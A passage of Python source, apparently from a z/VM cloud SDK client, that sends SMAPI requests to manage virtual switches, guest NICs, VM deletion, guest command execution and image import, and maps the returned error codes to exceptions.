nic_id = self._generate_increasing_nic_id(
fixed_ip_parameter.split(":")[5].replace("enc", ""))
if image_disk_type == 'SCSI':
(wwpn, lun) = self._get_wwpn_lun(userid)
if wwpn is None or lun is None:
err_msg = ("wwpn and lun is required for FCP devices,"
" please set LOADDEV for userid %s" % userid)
raise exception.SDKGuestOperationError(rs=14, userid=userid,
msg=err_msg)
wwpn = '0x' + wwpn
lun = '0x' + lun
if skipdiskcopy:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, transportfiles, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, image_file, transportfiles,
image_disk_type, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file, transportfiles, image_disk_type, nic_id,
fixed_ip_parameter]
def grant_user_to_vswitch(self, vswitch_name, userid):
"""Set vswitch to grant user."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k grant_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to grant user %s to vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def _set_vswitch_exception(self, error, switch_name):
if ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)):
errmsg = ("Operation is not allowed for a "
"VLAN UNAWARE vswitch")
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2838) or
(error.results['rs'] == 2853) or
(error.results['rs'] == 2856) or
(error.results['rs'] == 2858) or
(error.results['rs'] == 3022) or
(error.results['rs'] == 3033))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
else:
raise error
def revoke_user_from_vswitch(self, vswitch_name, userid):
"""Revoke user for vswitch."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k revoke_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to revoke user %s from vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def image_performance_query(self, uid_list):
"""Call Image_Performance_Query to get guest current status.
:uid_list: A list of zvm userids to be queried
"""
if uid_list == []:
return {}
if not isinstance(uid_list, list):
uid_list = [uid_list]
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Image_Performance_Query" % smt_userid,
"--operands",
'-T "%s"' % (' '.join(uid_list)),
"-c %d" % len(uid_list)))
action = "get performance info of userid '%s'" % str(uid_list)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
# in 'off'state, the smcli will only returns the queried
# userid number, no valid performance info returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def system_image_performance_query(self, namelist):
"""Call System_Image_Performance_Query to get guest current status.
:namelist: A namelist that defined in smapi namelist file.
"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API System_Image_Performance_Query" % smt_userid,
"--operands -T %s" % namelist))
action = "get performance info of namelist '%s'" % namelist
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
# in 'off'state, the smcli will only returns the queried
# userid number, no valid performance info returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def virtual_network_vswitch_query_byte_stats(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" %
smt_userid,
"--operands",
'-T "%s"' % smt_userid,
'-k "switch_name=*"'
))
action = "query vswitch usage info"
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return self._parse_vswitch_inspect_data(results['response'])
def get_host_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost general")
host_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.RINV_HOST_KEYWORDS)
return host_info
def get_diskpool_info(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost diskpoolspace %s" % pool)
dp_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_KEYWORDS)
return dp_info
def get_vswitch_list(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid,
"--operands",
"-s \'*\'"))
try:
result = self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
LOG.warning("No Virtual switch in the host")
return []
else:
LOG.error("Failed to get vswitch list, error: %s" %
err.format_message())
raise
with zvmutils.expect_invalid_resp_data():
if (not result['response'] or not result['response'][0]):
return []
else:
data = '\n'.join([s for s in result['response']
if isinstance(s, six.string_types)])
output = re.findall('VSWITCH: Name: (.*)', data)
return output
def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k grant_userid=%s" % userid,
"-k switch_name=%s" % vswitch_name,
"-k user_vlan_id=%s" % vlan_id,
"-k persist=YES"))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, "
"error: %s" %
(vlan_id, vswitch_name, userid, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s successfully'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
def add_vswitch(self, name, rdev=None, controller='*',
connection='CONNECT', network_type='ETHERNET',
router="NONROUTER", vid='UNAWARE', port_type='ACCESS',
gvrp='GVRP', queue_mem=8, native_vid=1, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Create_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % name))
if rdev is not None:
rd += " -k real_device_address" +\
"=\'%s\'" % rdev.replace(',', ' ')
if controller != '*':
rd += " -k controller_name=%s" % controller
rd = ' '.join((rd,
"-k connection_value=%s" % connection,
"-k queue_memory_limit=%s" % queue_mem,
"-k transport_type=%s" % network_type,
"-k vlan_id=%s" % vid,
"-k persist=%s" % (persist and 'YES' or 'NO')))
# Only if vswitch is vlan awared, port_type, gvrp and native_vid are
# allowed to specified
if isinstance(vid, int) or vid.upper() != 'UNAWARE':
rd = ' '.join((rd,
"-k port_type=%s" % port_type,
"-k gvrp_value=%s" % gvrp,
"-k native_vlanid=%s" % native_vid))
if router is not None:
rd += " -k routing_value=%s" % router
msg = ('Start to create vswitch %s' % name)
LOG.info(msg)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to create vswitch %s, error: %s" %
(name, err.format_message()))
raise
msg = ('Create vswitch %s successfully' % name)
LOG.info(msg)
def set_vswitch(self, switch_name, **kwargs):
"""Set vswitch"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name))
for k, v in kwargs.items():
rd = ' '.join((rd,
"-k %(key)s=\'%(value)s\'" %
{'key': k, 'value': v}))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set vswitch %s, error: %s" %
(switch_name, err.format_message()))
self._set_vswitch_exception(err, switch_name)
def delete_vswitch(self, switch_name, persist=True):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to delete vswitch %s' % switch_name)
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Delete_Extended" %
smt_userid,
"--operands",
"-k switch_name=%s" % switch_name,
"-k persist=%s" % (persist and 'YES' or 'NO')))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
if ((results['rc'] == 212) and
(results['rs'] == 40)):
LOG.warning("Vswitch %s does not exist", switch_name)
return
else:
LOG.error("Failed to delete vswitch %s, error: %s" %
(switch_name, err.format_message()))
raise
msg = ('Delete vswitch %s successfully' % switch_name)
LOG.info(msg)
def create_nic(self, userid, vdev=None, nic_id=None,
mac_addr=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'ID is %(id)s, address is %(address)s',
{'vdev': nic_vdev,
'id': nic_id or 'not specified',
'address': mac_addr or 'not specified'})
self._create_nic(userid, nic_vdev, nic_id=nic_id,
mac_addr=mac_addr, active=active)
return nic_vdev
def _create_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=7,
vdev=vdev, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _create_nic_active_exception(self, error, userid, vdev):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 28))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
elif ((error.results['rc'] == 396) and
(error.results['rs'] == 2797)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _is_active(self, userid):
# Get the vm status
power_state = self.get_power_state(userid)
if power_state == 'off':
LOG.error('The vm %s is powered off, '
'active operation is not allowed' % userid)
raise exception.SDKConflictError(modID='network', rs=1,
userid=userid)
def _create_nic(self, userid, vdev, nic_id=None, mac_addr=None,
active=False):
if active:
self._is_active(userid)
msg = ('Start to create nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended_DM' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
if mac_addr is not None:
mac = ''.join(mac_addr.split(':'))[6:]
requestData += ' -k mac_id=%s' % mac
retry = 1
for secs in [1, 3, 5, 8, -1]:
try:
self._request(requestData)
break
except exception.SDKSMTRequestFailed as err:
if (err.results['rc'] == 400 and
err.results['rs'] == 12 and
retry < 5):
LOG.info("The VM is locked, will retry")
time.sleep(secs)
retry += 1
else:
LOG.error("Failed to create nic %s for user %s in "
"the guest's user direct, error: %s" %
(vdev, userid, err.format_message()))
self._create_nic_inactive_exception(err, userid, vdev)
if active:
if mac_addr is not None:
LOG.warning("Ignore the mac address %s when "
"adding nic on an active system" % mac_addr)
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Create_Extended' %
userid,
"--operands",
"-k image_device_number=%s" % vdev,
"-k adapter_type=QDIO"))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
msg1 = err1.format_message()
persist_OK = True
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Adapter_Delete_DM' % userid,
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results = err2.results
msg2 = err2.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._create_nic_active_exception(err1, userid, vdev)
else:
raise exception.SDKNetworkOperationError(rs=4,
nic=vdev, userid=userid,
create_err=msg1, revoke_err=msg2)
self._NetDbOperator.switch_add_record(userid, vdev, port=nic_id)
msg = ('Create nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def get_user_direct(self, userid):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm %s directory" % userid)
return results.get('response', [])
def get_all_user_direct(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getvm alldirectory")
return results.get('response', [])
def _delete_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=8,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _delete_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=9,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def delete_nic(self, userid, vdev, active=False):
if active:
self._is_active(userid)
vdev_exist = False
nic_list = self._NetDbOperator.switch_select_record_for_userid(userid)
for p in nic_list:
if (int(p['interface'], 16) == int(vdev, 16)):
vdev_exist = True
vdev_info = p
break
if not vdev_exist:
# Device has already be removed from user direct
LOG.warning("Virtual device %s does not exist in the switch table",
vdev)
if active:
try:
resp = self.execute_cmd(userid, 'vmcp q %s' % vdev)
nic_info = "%s ON NIC" % vdev.zfill(4).upper()
osa_info = "%s ON OSA" % vdev.zfill(4).upper()
if nic_info in resp[0]:
pass
elif osa_info in resp[0]:
self._undedicate_nic(userid, vdev, active=active,
del_active_only=True)
return
else:
LOG.warning("Device %s of guest %s is not "
"network adapter" % (vdev, userid))
return
except exception.SDKSMTRequestFailed as err:
emsg = err.format_message()
ignored_msg = ('Device %s does not exist'
% vdev.zfill(4).upper())
if (emsg.__contains__(ignored_msg)):
LOG.warning("Virtual device %s does not exist for "
"active guest %s" % (vdev, userid))
return
else:
raise
else:
return
else:
# Device hasnot be removed from user direct,
# check whether it is related to a dedicated OSA device
if ((vdev_info["comments"] is not None) and
(vdev_info["comments"].__contains__('OSA='))):
self._undedicate_nic(userid, vdev, active=active)
return
msg = ('Start to delete nic device %(vdev)s for guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if vdev_exist:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete_DM" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to delete nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._delete_nic_inactive_exception(err, userid, vdev)
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Delete" %
userid,
"--operands",
'-v %s' % vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to delete nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._delete_nic_active_exception(err, userid, vdev)
msg = ('Delete nic device %(vdev)s for guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _couple_active_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 212) and
((error.results['rs'] == 28) or
(error.results['rs'] == 8))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % vswitch
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2788) or
(error.results['rs'] == 2848) or
(error.results['rs'] == 3034) or
(error.results['rs'] == 6011))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
else:
raise error
def _couple_inactive_exception(self, error, userid, vdev, vswitch):
if ((error.results['rc'] == 412) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=10,
vdev=vdev, userid=userid,
vsw=vswitch,
msg=errmsg)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=11,
vdev=vdev, userid=userid,
vsw=vswitch,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
raise error
def _couple_nic(self, userid, vdev, vswitch_name,
active=False):
"""Couple NIC to vswitch by adding vswitch into user direct."""
if active:
self._is_active(userid)
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Connect_Vswitch',
"--operands",
"-v %s" % vdev,
"-n %s" % vswitch_name))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err1:
results1 = err1.results
msg1 = err1.format_message()
if ((results1 is not None) and
(results1['rc'] == 204) and
(results1['rs'] == 20)):
LOG.warning("Virtual device %s already connected "
"on the active guest system", vdev)
else:
persist_OK = True
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect_DM',
"--operands",
'-v %s' % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
results2 = err2.results
msg2 = err2.format_message()
if ((results2 is not None) and
(results2['rc'] == 212) and
(results2['rs'] == 32)):
persist_OK = True
else:
persist_OK = False
if persist_OK:
self._couple_active_exception(err1, userid, vdev,
vswitch_name)
else:
raise exception.SDKNetworkOperationError(rs=3,
nic=vdev, vswitch=vswitch_name,
couple_err=msg1, revoke_err=msg2)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
vswitch_name)
msg = ('Couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s successfully'
% {'vdev': vdev, 'vm': userid, 'vsw': vswitch_name})
LOG.info(msg)
def couple_nic_to_vswitch(self, userid, nic_vdev,
vswitch_name, active=False, vlan_id=-1):
"""Couple nic to vswitch."""
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Connect nic %s to switch %s %s",
nic_vdev, vswitch_name, msg)
# previously we use Virtual_Network_Adapter_Connect_Vswitch_DM
# but due to limitation in SMAPI, we have to create such user
# direct by our own due to no way to add VLAN ID
msg = ('Start to couple nic device %(vdev)s of guest %(vm)s '
'with vswitch %(vsw)s with vlan %(vlan_id)s:'
% {'vdev': nic_vdev, 'vm': userid, 'vsw': vswitch_name,
'vlan_id': vlan_id})
LOG.info(msg)
user_direct = self.get_user_direct(userid)
new_user_direct = []
nicdef = "NICDEF %s" % nic_vdev
for ent in user_direct:
if len(ent) > 0:
new_user_direct.append(ent)
if ent.upper().startswith(nicdef):
# vlan_id < 0 means no VLAN ID given
v = nicdef
if vlan_id < 0:
v += " LAN SYSTEM %s" % vswitch_name
else:
v += " LAN SYSTEM %s VLAN %s" % (vswitch_name, vlan_id)
new_user_direct.append(v)
try:
self._lock_user_direct(userid)
except exception.SDKSMTRequestFailed as e:
raise exception.SDKGuestOperationError(rs=9, userid=userid,
err=e.format_message())
# Replace user directory
try:
self._replace_user_direct(userid, new_user_direct)
except exception.SDKSMTRequestFailed as e:
rd = ("SMAPI %s API Image_Unlock_DM " % userid)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err2:
# ignore 'not locked' error
if ((err2.results['rc'] == 400) and (
err2.results['rs'] == 24)):
LOG.debug("Guest '%s' unlocked successfully." % userid)
pass
else:
# just print error and ignore this unlock error
msg = ("Unlock definition of guest '%s' failed "
"with SMT error: %s" %
(userid, err2.format_message()))
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=10,
userid=userid,
err=e.format_message())
self._couple_nic(userid, nic_vdev, vswitch_name, active=active)
def _uncouple_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 204) and (error.results['rs'] == 28)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=12,
vdev=vdev, userid=userid,
msg=errmsg)
else:
raise error
def _uncouple_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 404) and (error.results['rs'] == 8)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 4)):
obj_desc = "Guest %s" % vdev
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=13,
vdev=vdev, userid=userid,
obj=obj_desc)
else:
raise error
def _uncouple_nic(self, userid, vdev, active=False):
"""Uncouple NIC from vswitch"""
if active:
self._is_active(userid)
msg = ('Start to uncouple nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
requestData = ' '.join((
'SMAPI %s' % userid,
"API Virtual_Network_Adapter_Disconnect_DM",
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 212) and
(results['rs'] == 32)):
LOG.warning("Virtual device %s is already disconnected "
"in the guest's user direct", vdev)
else:
LOG.error("Failed to uncouple nic %s in the guest's user "
"direct, error: %s" % (vdev, emsg))
self._uncouple_inactive_exception(err, userid, vdev)
"""Update information in switch table."""
self._NetDbOperator.switch_update_record_with_switch(userid, vdev,
None)
# the inst must be active, or this call will failed
if active:
requestData = ' '.join((
'SMAPI %s' % userid,
'API Virtual_Network_Adapter_Disconnect',
"--operands",
"-v %s" % vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results is not None) and
(results['rc'] == 204) and
(results['rs'] == 48)):
LOG.warning("Virtual device %s is already "
"disconnected on the active "
"guest system", vdev)
else:
LOG.error("Failed to uncouple nic %s on the active "
"guest system, error: %s" % (vdev, emsg))
self._uncouple_active_exception(err, userid, vdev)
msg = ('Uncouple nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def uncouple_nic_from_vswitch(self, userid, nic_vdev,
active=False):
if active:
msg = ("both in the user direct of guest %s and on "
"the active guest system" % userid)
else:
msg = "in the user direct of guest %s" % userid
LOG.debug("Disconnect nic %s with network %s",
nic_vdev, msg)
self._uncouple_nic(userid, nic_vdev, active=active)
def delete_userid(self, userid):
rd = ' '.join(('deletevm', userid, 'directory'))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if err.results['rc'] == 400 and err.results['rs'] == 4:
# guest vm definition not found
LOG.debug("The guest %s does not exist." % userid)
return
# ingore delete VM not finished error
if err.results['rc'] == 596 and err.results['rs'] == 6831:
# 596/6831 means delete VM not finished yet
LOG.warning("The guest %s deleted with 596/6831" % userid)
return
msg = "SMT error: %s" % err.format_message()
raise exception.SDKSMTRequestFailed(err.results, msg)
def delete_vm(self, userid):
self.delete_userid(userid)
# remove userid from smapi namelist
self.namelist_remove(zvmutils.get_namelist(), userid)
# revoke userid from vswitch
action = "revoke id %s authority from vswitch" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
switch_info = self._NetDbOperator.switch_select_record_for_userid(
userid)
switch_list = set()
for item in switch_info:
switch_list.add(item['switch'])
for item in switch_list:
if item is not None:
self.revoke_user_from_vswitch(item, userid)
# cleanup db record from network table
action = "delete network record for user %s" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._NetDbOperator.switch_delete_record_for_userid(userid)
# TODO: cleanup db record from volume table
pass
# cleanup persistent folder for guest
self._pathutils.remove_guest_path(userid)
# cleanup db record from guest table
action = "delete guest %s from database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.delete_guest_by_userid(userid)
def execute_cmd(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
with zvmutils.log_and_reraise_smt_request_failed(action='execute '
'command on vm via iucv channel'):
results = self._request(requestData)
ret = results['response']
return ret
def execute_cmd_direct(self, userid, cmdStr):
""""cmdVM."""
requestData = 'cmdVM ' + userid + ' CMD \'' + cmdStr + '\''
results = self._smt.request(requestData)
return results
def image_import(self, image_name, url, image_meta, remote_host=None):
"""Import the image specified in url to SDK image repository, and
create a record in image db, the imported images are located in
image_repository/prov_method/os_version/image_name/, for example,
/opt/sdk/images/netboot/rhel7.2/90685d2b-167bimage/0100"""
image_info = []
try:
image_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image record %s doens't exist in SDK image datebase,"
" will import the image and create record now" % image_name)
LOG.info(msg)
# Ensure the specified image is not exist in image DB
if image_info:
msg = ("The image name %s has already exist in SDK image "
"database, please check if they are same image or consider"
" to use a different image name for import" % image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=13, img=image_name)
try:
image_os_version = image_meta['os_version'].lower()
target_folder = self._pathutils.create_import_image_repository(
image_os_version, const.IMAGE_TYPE['DEPLOY'],
image_name)
except Exception as err:
msg = ('Failed to create repository to store image %(img)s with '
'error: %(err)s, please make sure there are enough space '
'on zvmsdk server and proper permission to create the '
'repository' % {'img': image_name,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
if self.is_rhcos(image_os_version):
image_disk_type = image_meta.get('disk_type')
if ((image_disk_type is None) or
((image_disk_type.upper() != "DASD" and
image_disk_type.upper() != "SCSI"))):
msg = ('Disk type is required for RHCOS image import, '
'the value should be DASD or SCSI')
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
else:
comments = {'disk_type': image_disk_type.upper()}
comments = str(comments)
else:
comments = None
try:
import_image_fn = urlparse.urlparse(url).path.split('/')[-1]
import_image_fpath = '/'.join([target_folder, import_image_fn])
self._scheme2backend(urlparse.urlparse(url).scheme).image_import(
image_name, url,
import_image_fpath,
remote_host=remote_host)
# Check md5 after import to ensure import a correct image
# TODO change to use query image name in DB
